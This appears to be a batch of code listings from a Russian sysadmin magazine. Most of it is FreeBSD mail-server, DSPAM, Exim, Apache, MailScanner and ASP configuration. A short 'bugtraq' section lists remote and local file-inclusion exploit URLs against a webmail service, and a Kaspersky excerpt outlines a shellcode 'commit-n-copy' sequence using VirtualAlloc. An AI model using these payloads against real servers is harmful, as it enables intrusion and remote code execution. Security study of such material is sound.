courier_imap_pop3d.sh 045.courier-pop3d.sh # mv courier_imap_imapd_ssl 050.courier-imaps.sh # mv courier_imap_pop3d_ssl 055.courier_pop3ds.sh courier_authdaemond_enable-"YES" courier_imap_imapd_enable-"YES" courier_imap_pop3d_enable-"YES" courier_imap_imapd_ssl_enable-"YES" courier_imap_pop3d_ssl_enable-"YES" # /usr/local/etc/rc.d/035.courier-auth.sh start # /usr/local/etc/rc.d/040.courier-imapd.sh start # /usr/local/etc/rc.d/045.courier-pop3d.sh start # /usr/local/etc/rc.d/050.courier-imaps.sh start # /usr/local/etc/rc.d/055.courier-pop3ds.sh start # telnet 127.0.0.1 110 # telnet 127.0.0.1 143 # openssl OpenSSL> s_client -host localhost -port 995 OpenSSL> s_client -host localhost -port 993 # cd /usr/ports/mail/dspam # make fetch # cd /usr/Install # tar -xvzf /usr/ports/distfiles/dspam-3.4.8.tar.gz # cd dspam-3.4.8 # ./configure -prefix=/usr/local/dspam \ --includedir=/usr/local/dspam/include \ --mandir=/usr/local/dspam/share/man \ --infodir=/usr/local/dspam/share/info \ --sysconfdir=/usr/local/dspam/etc \ 
--localstatedir=/usr/local/dspam/var \ --libexecdir=/usr/local/dspam/lib \ --with-dspam-home=/usr/local/dspam/var/spool \ --enable-debug \ --enable-domain-scale \ --enable-signature-headers \ --with-delivery-agent="/usr/sbin/exim -oi -oMr spam-scanned" \ --enable-whitelist \ --enable-virtual-users \ --enable-experimental \ --with-logdir=/var/log/dspam \ --enable-neural-networking \ --with-storage-driver=mysql_drv \ --with-mysql-includes=/usr/local/include/mysql \ --with-mysql-libraries=/usr/local/lib/mysql \ --enable-preferences-extension # make # make install # cd /usr/local/dspam/etc/ # cat > dspam.conf << "EOF" # Домашняя директория DSPM для работы сервиса Home /usr/local/dspam/var/spool # Агент для обработки почты TrustedDeliveryAgent "/usr/sbin/exim -oi -oMr spam-scanned" OnFail error # Пользователи с привилегиями которых может работать DSPAM Trust exim Trust root Trust mail Trust mailnull Trust smmsp Trust daemon # Включаем отладку Debug * # Включаем самообучение TrainingMode teft Feature chained Feature tb=5 Feature whitelist # Включаем алгоритмы проверки писем Algorithm graham burton PValue graham Preference "spamAction=quarantine" Preference "signatureLocation=message" # 'message' or 'headers' Preference "showFactors=on" AllowOverride trainingMode AllowOverride spamAction spamSubject AllowOverride statisticalSedation AllowOverride enableBNR AllowOverride enableWhitelist AllowOverride signatureLocation AllowOverride showFactors AllowOverride optIn optOut AllowOverride whitelistThreshold # Описываем подключение к базе данных MySQLServer localhost MySQLPort 3306 MySQLUser exim MySQLPass youpassword MySQLDb dspam MySQLCompress true Notifications on PurgeSignatures 14 PurgeNeutral 90 PurgeUnused 90 PurgeHapaxes 30 PurgeHits1S 15 PurgeHits1I 15 LocalMX 127.0.0.1 SystemLog on UserLog on Opt out EOF # mysql -u root -ppassword mysql> create database dspam; mysql> grant all on dspam.* to exim@localhost identified by 'youpassword'; mysql> \quit # cd 
/usr/Install/dspam-3.4.8/src/tools.mysql_drv # mysql -u exim -pyoupassowrd dspam < mysql_objects-4.1.sql # mysql -u exim -pyoupassowrd dspam < neural.sql # mysql -u exim -pyoupassowrd dspam < virtual_users.sql dspam_addspam: driver = accept expn = false domains = +local_domains local_parts = spam transport = addspam headers_add = "X-DSPAM-REPORT: Missclassified" dspam_falsepositive: driver = accept expn = false domains = +local_domains local_parts = ham:nospam transport = falsepositive headers_add = "X-DSPAM-REPORT: Falsepositive" spamscan_router: no_verify headers_remove = X-FILTER-SPAM : X-Spam-Score : X-Spam-Score-Gate : X-Spam-Report : X-Spam-Gate-Subject : X-Spam-Flag : X-S condition = "${if and {{!eq{$received_protocol}{spam-scanned}} {!def:h_X-FILTER-SPAM:}} {1}{0}}" driver = accept headers_add = X-FILTER-SPAM: ICF Team Spam Filter on $primary_hostname, $tod_full\n X-SENDER-INFO: ${if def:authenticated_id {ID - ${authenticated_id},}} \ ${if def:authenticated_sender {authenticated_sender - ${authenticated_sender},}} \ ${if def:sender_ident {rfc1413(ident) - ${sender_ident},}} \ ${if def:originator_uid {UID - ${originator_uid},}} \ ${if def:originator_gid {GID - ${originator_gid}}} local_parts = !addham:!addspam:!ham:!spam:!sexy transport = spamcheck_transport require_files = /usr/local/dspam/var/spool:/usr/local/dspam/bin/dspam spam_reject: driver = redirect check_local_user user = exim group = mail headers_add = "X-DSPAM-Rreport: Rejected" condition = ${if eq {$h_X-DSPAM-Result:}{Spam}{yes}{no}} allow_fail = true require_files = $local_part:/usr/local/vmail/${domain}/spam/$local_part errors_to = "" data = :blackhole: more = false spamcheck_transport: driver = pipe command = "/usr/sbin/exim -oi -oMr spam-scanned -bS" transport_filter = /usr/local/dspam/bin/dspam --stdout --deliver=innocent,spam --user $local_part@$domain --mail-from "${lc:$sender_address}" --rcpt-to "${lc:$local_part}@${lc:$domain}" user = exim group = mail use_bsmtp = true home_directory = 
"/usr/local/dspam/var/spool" current_directory = "/usr/local/dspam/var/spool" delivery_date_add = true return_path_add = true envelope_to_add = true log_fail_output = true log_defer_output = true return_fail_output = true message_prefix = "" message_suffix = "" temp_errors = * addspam: driver = pipe command = /usr/local/dspam/bin/dspam --user ${lc:$sender_address} --class=spam --source=error return_path_add = false return_fail_output = true log_output = true home_directory = "/usr/local/dspam/var/spool" current_directory = "/usr/local/dspam/var/spool" user = exim group = mail message_prefix = "" message_suffix = "" falsepositive: driver = pipe command = /usr/local/dspam/bin/dspam --user ${lc:$sender_address} --class=innocent --source=error return_path_add = false return_fail_output = true log_output = true home_directory = "/usr/local/dspam/var/spool" current_directory = "/usr/local/dspam/var/spool" user = exim group = mail message_prefix = "" message_suffix = "" # /usr/local/etc/rc.d/030.exim.sh restart # cd /usr/ports/www/apache13-modssl # make WITH_APACHE_SUEXEC=yes APACHE_SUEXEC_DOCROOT=/usr/local/www/vhosts APACHE_SUEXEC_UIDMIN=50 APACHE_SUEXEC_GIDMIN=5 # make # make install # cd /usr/ports/www/mod_perl # make all install clean # cd /usr/ports/graphics/p5-GD-Graph3d/ # make all install clean # cd /usr/ports/lang/php4-extensions # make all install clean AddType application/x-httpd-php .php .phtml AddType application/x-httpd-php-source .phps NameVirtualHost * # CGI-интерфейс DSPAM ServerName dspam.test.com ServerAlias dspam.test.com Options Includes Indexes FollowSymLinks ExecCGI DocumentRoot /usr/local/www/vhosts/dspam.test.com User exim Group mail Options Includes Indexes FollowSymLinks ExecCGI AllowOverride All Order allow,deny Allow from all DirectoryIndex index.html AddHandler cgi-script .cgi PerlSendHeader On AddHandler cgi-script .cgi PerlHandler Apache::Registry ErrorLog /usr/local/www/logs/dspam.test.com/errors.log CustomLog 
/usr/local/www/logs/dspam.test.com/access.log common #Веб-интерфейс SquirrelMail ServerName mail.test.com ServerAlias test.com Options Includes Indexes FollowSymLinks MultiViews DocumentRoot /usr/local/www/vhosts/mail.test.com DirectoryIndex index.php index.phtml index.html ErrorLog /usr/local/www/logs/mail.test.com/errors.log CustomLog /usr/local/www/logs/mail.test.com/access.log common # cd /usr/local/www # mkdir -p vhosts/dspam.test.com vhosts/mail.test.com logs/dspam.test.com logs/mail.test.com # touch logs/dspam.test.com/access.log logs/mail.test.com/access.log logs/dspam.test.com/errors.log logs/mail.test.com/errors.log # chown -R www:www logs # cd vhosts/dspam.test.com # cp -R /usr/Install/dspam-3.4.8/cgi/* . # cd ../ # chown -R exim:mail dspam.test.com #cat > .htaccess << "EOF" AuthType Basic AuthName "DSPAM Statistic Server" AuthUserFile /usr/local/www/passwd/htpaasswd require valid-user EOF # chown www:www .htaccess # chmod 640 .htaccess # mkdir /usr/local/etc/apache/htpasswd # htpasswd -c /usr/local/etc/apache/htpasswd/htpasswd user@test.com # chown www:www /usr/local/etc/apache/htpasswd/htpasswd # chmod 640 /usr/local/etc/apache/htpasswd/htpaswd # cd /usr/ports//mail/squirrelmail # make all install clean # cd /usr/local/www/vhosts/mail.test.com # cp -R ../../squirrelmail/* . # cd ../ # chown -R www:www mail.test.com # cd mail.test.com # ./configure apache_enable="YES" # cd /usr/local/etc/rc.d # cp apache.sh 060.apache.sh # ./060.apache.sh start ----------------------------------------------------------------------------------------------------------------- bugtraq, стр. 
53 http://[host]:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ http://[host]:32000/dir/include.html?lang=[file]%00 http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST http://[host]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/; Example (using non-IE/Mozilla/Firefox browser): http://[host]:32000/mail/index.html?/mail/index.html? default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2 ----------------------------------------------------------------------------------------------------------------- Защищаем Windows-системы с помощью CORE FORCE Сергей Яремчук This policy denies to write and delete files and folder inside the windows and programs folder. This policy enables outgoing SMB connections.
----------------------------------------------------------------------------------------------------------------- Расширяем возможности MailScanner Сергей Яремчук # tar xzvf mailwatch-1.0.2.tar.gz # su mailwatch # /etc/init.d/mysqld start # mysql -u root -p < create.sql # mysql -u root -p mysql> SHOW TABLES; mysql> DESCRIBE users; mysql> INSERT INTO users VALUES ('grinder@test.ru',md5('pasword'),'sergej','A','1'); mysql> quit my($db_name) = 'mailscanner'; my($db_host) = 'localhost'; my($db_user) = 'mailwatch'; my($db_pass) = 'password'; # mv MailWatch.pm /opt/MailScanner/lib/MailScanner/MailScanner/CustomFunctions # mv SQLBlackWhiteList.pm /opt/MailScanner/lib/MailScanner/MailScanner/CustomFunctions # mv mailscanner /var/www/html/ # chown root:apache /var/www/html/mailscanner/images # chmod ug+rwx /var/www/html/mailscanner/images # chown root:apache /var/www/html/images/cache # chmod ug+rwx /var/www/html/images/cache // Database settings define(DB_TYPE, 'mysql'); define(DB_USER, 'mailwatch'); define(DB_PASS, 'password'); define(DB_HOST, 'localhost'); define(DB_NAME, 'mailscanner'); # mv conf.php.example conf.php # cp /var/www/html/mailscanner/mailq.php /usr/local/bin # crontab -e 0-59 * * * * /usr/local/bin/mailq.php Always Looked Up Last = &MailWatchLogging Detailed Spam Report = yes Quarantine Whole Message = yes Quarantine Whole Message As Queue Files = no Include Scores In SpamAssassin Report = yes Quarantine User = root Quarantine Group = apache # т.е. та же что и у веб-сервера Quarantine Permissions = 0660 # И для редактирования спам-списков. 
Is Definitely Not Spam = &SQLWhitelist Is Definitely Spam = &SQLBlacklist # /opt/MailScanner/bin/check_mailscanner */5 * * * * root /usr/bin/mrtg /etc/mrtg/mailscanner-mrtg # make install # wget -c http://www.while.homeunix.net/mailstats/Vispan-2.0.2.tar.gz # tar xzvf Vispan-2.0.2.tar.gz # cd Vispan-2.0.2 # perl Makefile.PL # Использование sendmail для блокировки спамерских адресов UseAccess = 0 # Использование IPtables для блокировки спамерских адресов. # Одновременное использование UseAccess и UseIPTables смысла не имеет UseIPTables = 1 # Использование эвристического удаления адресов из блокировки. Иначе будет сохраняться весь список спамеров UseHeuristics = 1 # Первичная блокировка адреса в минутах, далее время будет постоянно удваиваться BlockTime = 7200 # 5 дней # Адреса, которые не будут блокироваться. Можно задать одиночный IP или диапазон: # 192.168.0.0-192.168.0.10 или 192.168.0.1/24 WhiteList = 192.168.0.1 192.168.0.2 */10 * * * * root /usr/local/bin/Vispan ----------------------------------------------------------------------------------------------------------------- Судьба shell-кода на системах с неисполняемым стеком Крис Касперски Листинг 1. Последовательность вызова функций, реализующих атаку типа commit-n-copy VirtualAlloc(REMOTE_BASE, SHELLCODE_LENGTH, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(REMOTE_BASE, SHELLCODE_BASE, SHELLCODE_LENGTH); GOTO shell_code; Листинг 2. Функция VirtualAlloc и ее прототип LPVOID VirtualAlloc ( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect ); ----------------------------------------------------------------------------------------------------------------- Переходим от VBScript к ASP и ASP.NET. 
Безопасность и синтаксис Иван Коробко <%Script Language="VBScript"%> <%Script Language="JScript"%> <%@ Language=VBScript CODEPAGE=1251%> Заголовок страницы … <% … ' отображение на экране содержимого переменной Response.write variable %> X:\SETUP\SETUP.EXE /NO_BSLN_CHECK comAuthenticationLevel= PktPrivacy comImpersonationLevel= Impersonate comAuthenticationLevel="Default|None|Connect|Call|Pkt|PktIntegrity|PktPrivacy"; comImpersonationLevel="Default|Anonymous|Identity|Impersonate|Delegate" <% strMsgBox="Привет" response.write(strMsgBox) %> <% Dim strMsgBox As String strMsgBox="Привет" response.write(strMsgBox) %> Explicit = "False" <% Dim strMsgBox strMsgBox="Привет" response.write(strMsgBox) %> Dim Array(100) T="" T=VarType(Array) MsgBox T <% Response.Write(VarType(Parametr)) %> <%@ Strict="True" %> Strict = "True" <% Response.Write "Привет" %> <% Response.Write ("Привет") %> Set obj=CreateObject("Adodb.Connection") <% Set obj=Server.CreateObject("Adodb.Connection") %> <% obj=Server.CreateObject("Adodb.Connection") %> <%@ PageASPCompat="True" %> Try Code Catch err as Exception Response.write(err) End Try